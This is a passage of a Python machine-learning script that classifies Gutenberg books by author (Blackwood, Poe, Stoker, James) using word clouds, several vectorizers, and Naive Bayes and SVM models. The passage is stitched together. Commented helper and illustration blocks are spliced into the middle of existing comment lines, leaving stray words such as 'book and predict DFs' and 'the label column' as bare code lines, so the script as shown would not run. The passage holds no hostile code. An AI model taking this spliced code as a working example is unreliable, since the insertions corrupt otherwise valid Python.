bookDF['book_author']\nbookLabelArray = bookLabel.to_numpy()\npredictLabel = predictDF['book_author']\npredictLabelArray = predictLabel.to_numpy()\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = 
allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nblackwoodLabelVectorDF = blackwoodVectorDF.copy()\npoeLabelVectorDF = poeVectorDF.copy()\nstokerLabelVectorDF = stokerVectorDF.copy()\njamesLabelVectorDF = jamesVectorDF.copy()\nbookLabelVectorDF = bookVectorDF.copy()\npredictLabelVectorDF = predictVectorDF.copy()\nallbookLabelVectorDF = allbookVectorDF.copy()\nallbookLabelVectorDF_STEM = allbookVectorDF_STEM.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - no Binary, no TFIDF\nblackwoodLabelVectorDF.insert(0, 'book_author', blackwoodLabel)\npoeLabelVectorDF.insert(0, 'book_author', poeLabel)\nstokerLabelVectorDF.insert(0, 'book_author', stokerLabel)\njamesLabelVectorDF.insert(0, 'book_author', jamesLabel)\nbookLabelVectorDF.insert(0, 'book_author', bookLabel)\npredictLabelVectorDF.insert(0, 'book_author', predictLabel)\nallbookLabelVectorDF.insert(0, 'book_author', allbookLabel)\nallbookLabelVectorDF_STEM.insert(0, 'book_author', allbookLabel)\n\n###------------------------------------- Word Cloud Analysis -----------------------------------------\n# Using the vocabulary list - do a wordcloud\n# first we need to somehow rank the words by most common\n# ranking of the words\n\n# set stopwords\nmy_stopwords = set(nltk.corpus.stopwords.words('english'))\nmy_stopwords.update('gutenberg')\n\ndef plot_wordcloud (vocab, author, numwords):\n author_name = author_dict2.get(author)\n graph_title = \"Top \" + str(numwords) + \" (less stopwords) Most Common Words in \" + author_name\n # remove only standard 192 stop words\n wordcloud_text = WordCloud(stopwords=my_stopwords, collocations=False, background_color=\"black\", \n colormap = 'RdGy',\n prefer_horizontal = 0.85,\n max_font_size= 30, max_words=numwords).generate(' '.join(vocab))\n # show the plot\n plt.figure(figsize = (15,15))\n plt.axis(\"off\")\n plt.imshow(wordcloud_text, interpolation='bilinear')\n plt.title(graph_title, fontsize = 16)\n plt.show()\n\n# code from this source: \n# https://kavita-ganesan.com/how-to-use-countvectorizer/#Using-CountVectorizer-to-Extract-N-Gram-Term-Counts\ndef sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n \ndef extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"return n-gram counts in descending order of counts\"\"\"\n #use only topn items from vector\n sorted_items = sorted_items[:topn]\n score_vals = []\n feature_vals = []\n results=[]\n # word index, count i\n for idx, count in sorted_items:\n # get the ngram name\n n_gram=feature_names[idx]\n # collect as a list of tuples\n results.append((n_gram,count))\n return results\n\n# Use the functions\n# Blackwood Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(blackwoodVocab, \n sort_coo(blackwoodDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'blackwood', 250)\n\n# Poe Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(poeVocab, \n sort_coo(poeDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'poe', 250)\n\n# Stoker Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(stokerVocab, \n sort_coo(stokerDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'stoker', 250)\n\n# James Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(jamesVocab, \n sort_coo(jamesDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'james', 250)\n\n# Book Wordcloud\nwords_only 
= list(map(itemgetter(0), \n extract_topn_from_vector(bookVocab, \n sort_coo(bookDTM[0].tocoo()),500)))\nplot_wordcloud(words_only, 'all', 450)\n\n# Book Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(predictVocab, \n sort_coo(predictDTM[0].tocoo()),500)))\nplot_wordcloud(words_only, 'predict', 450)\n\n# ALL Books Wordclod\n# Book Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(allbookVocab_STEM, \n sort_coo(allbookDTM_STEM[0].tocoo()),500)))\nplot_wordcloud(words_only, 'all', 450)\n\n\n###------------------------------ Initial Analysis before Data Manipulation -------------------------\n# books per author\nnum_stokerBooks = len(stokerDF)\nnum_poeBooks = len(poeDF)\nnum_jamesBooks = len(jamesDF)\nnum_blackwoodBooks = len(blackwoodDF)\n\nnum_book_list =[num_blackwoodBooks, num_poeBooks, num_stokerBooks, num_jamesBooks]\n# build a dataframe \nbookFreqDF = []\nbookFreqDF = pd.DataFrame(columns = ['book_author', 'num_books'])\n\nindex = 0\nfor auth in author_dict:\n df_row = {'book_author': author_dict.get(auth),\n 'num_books': num_book_list[index]}\n # append the row to the bookDF\n bookFreqDF = bookFreqDF.append(df_row, ignore_index = True)\n index = index + 1\n\n# plot with seaborn \nfg = sns.catplot(x = \"book_author\", y = \"num_books\", hue = \"book_author\", dodge=False,\n height = 3, aspect = 3, palette=\"Spectral\", kind=\"bar\", data=bookFreqDF)\nfg.set_xticklabels(rotation=45, horizontalalignment = 'right', \n fontweight = 'light', fontsize = 'medium')\nfg.set(xlabel = \"Author\", ylabel = \"Number of Works by this Author\", \n title = \"Frequency of Works by Each Author\")\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\nlast_index = len(allbookLabel)\npredict_index = 65\n\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF = tempDF.iloc[0:predict_index]\npredictLabelVectorDF = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF)\nlen(predictLabel)\nlen(predictLabelVectorDF)\n\n# separate vectorDF\ntempDF = allbookVectorDF.copy()\n# recreate all the book and predict DFs\nbookVectorDF = tempDF.iloc[0:predict_index]\npredictVectorDF = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF)\nlen(predictVectorDF)\n\n# for STEM\n# predicted books are 65:end in the index\n# remove them from the set\nlast_index = len(allbookLabel)\npredict_index = 65\n\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_STEM.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_STEM = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_STEM = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_STEM)\nlen(predictLabel)\nlen(predictLabelVectorDF_STEM)\n\n# separate vectorDF\ntempDF = allbookVectorDF_STEM.copy()\n# recreate all the book and predict DFs\nbookVectorDF_STEM = tempDF.iloc[0:predict_index]\npredictVectorDF_STEM = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_STEM)\nlen(predictVectorDF_STEM)\n\n# this will need to be repeated when new vectorization is done\n\n#-------------------------------- Vectorization (binary) for Bernoulli--------------------------------\n# for the rest of the vectorization - only doing the full book set (all 4 authors)\n# and prediction set\n# pass in our own stopwords\nallbookCV_b = CountVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english',\n 
binary = 'True')\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_b = allbookCV_b.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_b = allbookCV_b.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_b = pd.DataFrame(allbookDTM_b.toarray(), columns = allbookVocab_b)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_b = allbookVectorDF_b.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - BINARY for BernoulliNB\nallbookLabelVectorDF_b.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_b.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_b = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_b = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_b)\nlen(predictLabelVectorDF_b)\n\n# separate vectorDF\ntempDF = allbookVectorDF_b.copy()\n# recreate all the book and predict DFs\nbookVectorDF_b = tempDF.iloc[0:predict_index]\npredictVectorDF_b = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_b)\nlen(predictVectorDF_b)\n\n#-------------------------------- Vectorization with TFIDF --------------------------------\n# for the rest of the vectorization - only doing the full book set (all 4 authors)\n# and prediction set\nallbookCV_TF = TfidfVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english')\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_TF = allbookCV_TF.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_TF = allbookCV_TF.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_TF = pd.DataFrame(allbookDTM_TF.toarray(), columns = allbookVocab_TF)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_TF = allbookVectorDF_TF.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *TFIDFVectorizer* vector TFIDF\nallbookLabelVectorDF_TF.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_TF.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_TF = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_TF = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_TF)\nlen(predictLabelVectorDF_TF)\n\n# separate vectorDF\ntempDF = allbookVectorDF_TF.copy()\n# recreate all the 
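\n#---------------------- Vectorize-and-Split Helper (sketch) ----------------------------\n# Two cautions on the vectorizers above: CountVectorizer's binary parameter\n# expects a boolean, and the string 'True' only works because any truthy\n# value enables binary mode; likewise input='conent' (a typo for 'content'\n# earlier) only works because, in the sklearn versions this script targets,\n# values other than 'filename'/'file' are treated as raw content. Since the\n# fit -> DataFrame -> label -> book/predict split pattern repeats for every\n# vectorizer, a hedged helper (vectorize_books is a hypothetical name) could\n# replace each block:\ndef vectorize_books(vectorizer, texts, labels, cut):\n # fit on all texts, wrap the DTM in a DataFrame, then split into the\n # labeled book set (rows [0, cut)) and the held-out predict set\n dtm = vectorizer.fit_transform(texts)\n vdf = pd.DataFrame(dtm.toarray(), columns = vectorizer.get_feature_names())\n ldf = vdf.copy()\n ldf.insert(0, 'book_author', labels)\n return vdf.iloc[0:cut], vdf.iloc[cut:], ldf.iloc[0:cut], ldf.iloc[cut:]\n\n# usage sketch for the binary/Bernoulli variant (note binary=True, a real boolean):\n#bookVectorDF_b, predictVectorDF_b, bookLabelVectorDF_b, predictLabelVectorDF_b = \\\n# vectorize_books(CountVectorizer(analyzer = 'word', stop_words = 'english', binary = True),\n# allbook_text_list, allbookLabel, predict_index)\n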
book and predict DFs\nbookVectorDF_TF = tempDF.iloc[0:predict_index]\npredictVectorDF_TF = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_TF)\nlen(predictVectorDF_TF)\n\n#-------------------- Vectorization for ngrams (bi-grams) for MultinomialNB ---------------------\n# ** NOTE: this is using non-stemmed data **\n# Create an instance of CountVectorizer (one for the corpus)\n# this should use both unigrams and bigrams, but I will also do bigrams and trigrams\n# now that we have good, clean data\nallbookCV_ub = CountVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english',\n ngram_range = (1,2))\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_ub = allbookCV_ub.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_ub = allbookCV_ub.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_ub = pd.DataFrame(allbookDTM_ub.toarray(), columns = allbookVocab_ub)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nallbookLabelVectorDF_ub = allbookVectorDF_ub.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - no Binary, no TFIDF\nallbookLabelVectorDF_ub.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_ub.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_ub = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_ub = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_ub)\nlen(predictLabelVectorDF_ub)\n\n# separate vectorDF\ntempDF = allbookVectorDF_ub.copy()\n# recreate all the book and predict DFs\nbookVectorDF_ub = tempDF.iloc[0:predict_index]\npredictVectorDF_ub = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_ub)\nlen(predictVectorDF_ub)\n\n#----------- Vectorization for ngrams (bi-grams and tri-grams) for MultinomialNB ---------------\n# ** NOTE: this is using non-stemmed data **\n# Create an instance of CountVectorizer (one for the corpus)\n# this should use both unigrams and bigrams, but I will also do bigrams and trigrams\n# now that we have good, clean data\nallbookCV_bt = CountVectorizer(input='content',\n analyzer = 'word',\n stop_words = 'english',\n ngram_range = (2,3))\n\n# build total list of just the book text\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nallbookDTM_bt = allbookCV_bt.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nallbookVocab_bt = allbookCV_bt.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nallbookVectorDF_bt = pd.DataFrame(allbookDTM_bt.toarray(), columns = allbookVocab_bt)\n\n# now we need to \"attach\" the author to each frame\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add 
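\n# Toy illustration (not project data) of what an ngram_range setting like the\n# ones used here produces; English stop words are removed first, and the\n# n-grams are then built from the remaining tokens in order:\ntoyCV = CountVectorizer(stop_words = 'english', ngram_range = (1,2))\ntoyCV.fit(['the raven tapped at the door'])\nprint(toyCV.get_feature_names())\n# expected: ['door', 'raven', 'raven tapped', 'tapped', 'tapped door']\n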
the label column\nallbookLabelVectorDF_bt = allbookVectorDF_bt.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - no Binary, no TFIDF\nallbookLabelVectorDF_bt.insert(0, 'book_author', allbookLabel)\n\n#-------------------------------- Update Vectorization for Book and Predict -------------------------\n# predicted books are 65:end in the index\n# remove them from the set\n# separate labelvectorDF\ntempDF = allbookLabelVectorDF_bt.copy()\n# recreate all the book and predict DFs\nbookLabelVectorDF_bt = tempDF.iloc[0:predict_index]\npredictLabelVectorDF_bt = tempDF.iloc[predict_index:last_index]\n\nlen(bookLabelVectorDF_bt)\nlen(predictLabelVectorDF_bt)\n\n# separate vectorDF\ntempDF = allbookVectorDF_bt.copy()\n# recreate all the book and predict DFs\nbookVectorDF_bt = tempDF.iloc[0:predict_index]\npredictVectorDF_bt = tempDF.iloc[predict_index:last_index]\n\nlen(bookVectorDF_bt)\nlen(predictVectorDF_bt)\n\n#------------------------------- Confusion Matrix Pretty Plotter -----------------------\n# use some code (used this in our project too)\n# to define a function to draw a pretty confusion matrix\n# found this at https://scikit-learn.org/0.23/auto_examples/model_selection/plot_confusion_matrix.html\nimport itertools\ndef my_plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.viridis_r):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n np.set_printoptions(precision=3)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=0)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], '.3f'),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n#------------------------------------ Training and Test sets for Modeling -------------------\n# create training and testing vars\n# for Author with CountVectorizer Vectors\ntsize = 0.25\nXbook_train, Xbook_test, ybook_train, ybook_test = train_test_split(bookVectorDF, \n bookLabelArray, \n test_size=tsize)\n## create training and testing vars\n# for Author with CountVectorizer Bernulli Vectors\nXbook_train_b, Xbook_test_b, ybook_train_b, ybook_test_b = train_test_split(bookVectorDF_b, \n bookLabelArray, \n test_size=tsize)\n# create training and testing vars\n# for Author with TFIDF Vectors\nXbook_train_TF, Xbook_test_TF, ybook_train_TF, ybook_test_TF = train_test_split(bookVectorDF_TF, \n bookLabelArray, \n test_size=tsize)\n# these are only used with MultiNomialNB and not elsewhere\n# create training and testing vars\n# for Author with CountVectorizer uni,bigrams\nXbook_train_ub, Xbook_test_ub, ybook_train_ub, ybook_test_ub = train_test_split(bookVectorDF_ub, \n bookLabelArray, \n test_size=tsize)\n## create training and testing vars\n# for Author with CountVectorizer bi,trigrams Vectors\nXbook_train_bt, Xbook_test_bt, ybook_train_bt, ybook_test_bt = train_test_split(bookVectorDF_bt, \n bookLabelArray, \n test_size=tsize)\n\n## create training and 
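\n# Note: each train_test_split call in this section draws its own random\n# split, so every model is scored on a different set of test books. A hedged\n# alternative is one shared, reproducible split of the row indices\n# (random_state value is arbitrary; stratify assumes at least two books per\n# author, which holds for these four corpora):\nidx_train, idx_test = train_test_split(np.arange(len(bookLabelArray)),\n test_size=tsize, random_state=736,\n stratify=bookLabelArray)\n# ... then slice each vectorization identically so every model sees the same books:\n#Xbook_train = bookVectorDF.iloc[idx_train]\n#Xbook_test = bookVectorDF.iloc[idx_test]\n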
testing vars\n# for Author with CountVectorizer STEMMED Vectors\nXbook_train_STEM, Xbook_test_STEM, ybook_train_STEM, ybook_test_STEM = train_test_split(bookVectorDF_STEM, \n bookLabelArray, \n test_size=tsize)\n\n# no need to set up test/training for predicting sets - they will be used as *test* sets in their \n# entirity - to see if they map to a particular one of the 4 original authors\n\n#------------------------------------------Multinomial Naive Bayes ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB= MultinomialNB()\n# Run for different items\nbookNB = myNB.fit(Xbook_train, ybook_train)\nbookPredict = myNB.predict(Xbook_test)\nprint(np.round(myNB.predict_proba(Xbook_test),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM = confusion_matrix(ybook_test, bookPredict)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM)\n\n# scores\nbookNB.score(Xbook_train, ybook_train)\nbookNB.score(Xbook_test, ybook_test)\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookPredict)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookPredict, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookPredict, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookPredict, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookPredict, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookPredict, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookPredict, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookPredict))\n\n\n#--------------------------------- STEMMED Multinomial Naive Bayes ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB_STEM = MultinomialNB()\n# Run for different items\nbookNB_STEM = myNB_STEM.fit(Xbook_train_STEM, ybook_train_STEM)\nbookPredict_STEM = myNB_STEM.predict(Xbook_test_STEM)\nprint(np.round(myNB_STEM.predict_proba(Xbook_test_STEM),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM_STEM = confusion_matrix(ybook_test_STEM, bookPredict_STEM)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM_STEM)\n\n# scores\nbookNB_STEM.score(Xbook_train_STEM, ybook_train_STEM)\nbookNB_STEM.score(Xbook_test_STEM, ybook_test_STEM)\n# Accuracy - test set\nAS = accuracy_score(ybook_test_STEM, bookPredict_STEM)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_STEM, bookPredict_STEM, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_STEM, bookPredict_STEM, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_STEM, bookPredict_STEM, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_STEM, bookPredict_STEM))\n\n\n#------------------------------------------- Bernoulli Classifier -------------------------------------\n# 
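\n#----------------------- Metrics Helper (sketch) ---------------------------------------\n# The accuracy/recall/precision/F1 print block repeats verbatim after every\n# model in this section; a hedged consolidation (report_scores is a\n# hypothetical name) keeps each experiment to two lines:\ndef report_scores(y_true, y_pred):\n # print the same metric block used throughout this section\n print(\"Accuracy is \", accuracy_score(y_true, y_pred))\n print(\"Recall is \", recall_score(y_true, y_pred, average=None))\n print(\"Precision Score is \", precision_score(y_true, y_pred, average=None))\n for avg in (None, 'micro', 'macro', 'weighted'):\n print(\"F1 (average=%s) is \" % avg, f1_score(y_true, y_pred, average=avg))\n print(classification_report(y_true, y_pred))\n\n# usage sketch: report_scores(ybook_test_b, bookPredictB)\n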
# create the Naive Bayes Bernoulli classifier (model)\nmyB_NB = BernoulliNB()\n# Run for different items\nbookB_NB = myB_NB.fit(Xbook_train_b, ybook_train_b)\nbookPredictB = myB_NB.predict(Xbook_test_b)\nprint(np.round(myB_NB.predict_proba(Xbook_test_b),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabelB_CM = confusion_matrix(ybook_test_b, bookPredictB)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabelB_CM)\n\n# scores\nbookB_NB.score(Xbook_train_b, ybook_train_b)\nbookB_NB.score(Xbook_test_b, ybook_test_b)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_b, bookPredictB)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_b, bookPredictB, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_b, bookPredictB, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_b, bookPredictB, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_b, bookPredictB, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_b, bookPredictB, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_b, bookPredictB, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_b, bookPredictB))\n\n#-------------------------------- TFIDF (with Multinomial NB) Classifier -------------------------------\n# create the Naive Bayes Multinomial classifier (model)\nmyTF_NB = MultinomialNB()\n# Run for different items\nbookTF_NB = myTF_NB.fit(Xbook_train_TF, ybook_train_TF)\nbookPredictTF = myTF_NB.predict(Xbook_test_TF)\nprint(np.round(myTF_NB.predict_proba(Xbook_test_TF),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabelTF_CM = confusion_matrix(ybook_test_TF, bookPredictTF)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabelTF_CM)\n\n# scores\nbookTF_NB.score(Xbook_train_TF, ybook_train_TF)\nbookTF_NB.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookPredictTF)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookPredictTF, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookPredictTF, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookPredictTF, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookPredictTF, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookPredictTF, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookPredictTF, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookPredictTF))\n\n#----------------------- Multinomial Naive Bayes (Unigrams and Bigrams) ---------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB = MultinomialNB()\n# Run for different items\nbookNB_ub = myNB.fit(Xbook_train_ub, ybook_train_ub)\nbookPredict_ub = myNB.predict(Xbook_test_ub)\nprint(np.round(myNB.predict_proba(Xbook_test_ub),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM_ub = confusion_matrix(ybook_test_ub, bookPredict_ub)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM_ub)\n\n# scores\nbookNB_ub.score(Xbook_train_ub, ybook_train_ub)\nbookNB_ub.score(Xbook_test_ub, 
ybook_test_ub)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_ub, bookPredict_ub)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_ub, bookPredict_ub, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_ub, bookPredict_ub, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_ub, bookPredict_ub, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_ub, bookPredict_ub))\n\n#------------------------- Multinomial Naive Bayes (Bigrams and Trigrams) ---------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB= MultinomialNB()\n# Run for different items\nbookNB_bt = myNB.fit(Xbook_train_bt, ybook_train_bt)\nbookPredict_bt = myNB.predict(Xbook_test_bt)\nprint(np.round(myNB.predict_proba(Xbook_test_bt),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\nbookLabel_CM_bt = confusion_matrix(ybook_test_bt, bookPredict_bt)\nprint(\"\\nThe confusion matrix is:\")\nprint(bookLabel_CM_bt)\n\n# scores\nbookNB_bt.score(Xbook_train_bt, ybook_train_bt)\nbookNB_bt.score(Xbook_test_bt, ybook_test_bt)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_bt, bookPredict_bt)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_bt, bookPredict_bt, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_bt, bookPredict_bt, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_bt, bookPredict_bt, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_bt, bookPredict_bt))\n\n#----------------------- Support Vector Machines ---------------------------------------------\n#---- Now do the same with SVM and 3 different kernels - with two different vectorizers ------\n#------------------------------------ SVM with Linear kernel ---------------------------------\n# with Countvectorizer\nSVM_Model=LinearSVC(C=1)\nbookSVM_Linear = SVM_Model.fit(Xbook_train, ybook_train)\nbookSVMPredict = SVM_Model.predict(Xbook_test)\n\nSVM_matrix = 